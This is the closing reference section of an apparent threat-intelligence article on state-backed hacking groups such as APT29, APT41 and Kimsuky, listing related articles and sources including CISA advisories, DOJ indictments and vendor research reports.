- Entra ID Attacks in Practice: Device Code Phishing, PRT Theft, and Conditional Access Bypass — Covers the device code authentication abuse technique used by APT29
- The Package You Trusted: How the Axios Supply Chain Attack Happened — Supply chain attack anatomy, relevant to Lazarus npm poisoning campaigns
- Modern Windows Attack Techniques in 2026 — Cross-reference for LOTL, steganography, and COM hijacking techniques used by APT28’s PRISMEX
Sources
- ENISA Threat Landscape 2025 — enisa.europa.eu
- CISA/NSA/FBI Joint Advisory: Volt Typhoon Pre-Positioning in U.S. Critical Infrastructure
- CISA/ASD Joint Advisory: APT40 Rapid Vulnerability Exploitation
- U.S. DOJ Indictments: APT41 (September 2020), APT40/Hainan (July 2021), Andariel (July 2025)
- U.S. Treasury OFAC Sanctions: Kimsuky (May 2023), Andariel (July 2025)
- Microsoft Threat Intelligence: Midnight Blizzard (APT29) GRAPELOADER Campaign, April 2025
- Microsoft Threat Intelligence: Seashell Blizzard / Sandworm DynoWiper, December 2025
- Mandiant / Google Cloud Threat Intelligence: APT41 Q1 2025 Surge Analysis
- Palo Alto Unit 42: APT34 Veaty and Spearal Backdoor Technical Analysis
- ESET Research: Turla Kazuar v2 and Gamaredon Collaboration Assessment
- CrowdStrike 2026 Global Threat Report — adversary breakout time metrics
- FBI Public Service Announcement: Kimsuky QR Code Phishing Campaigns, January 2026
- Chainalysis Crypto Crime Report 2025 — North Korea cryptocurrency theft figures
- Poland CERT: DynoWiper Incident Response Report, December 2025
- Check Point Research: MuddyWater Operation Olalampo and Phoenix Backdoor Analysis
- MITRE ATT&CK Framework — attack.mitre.org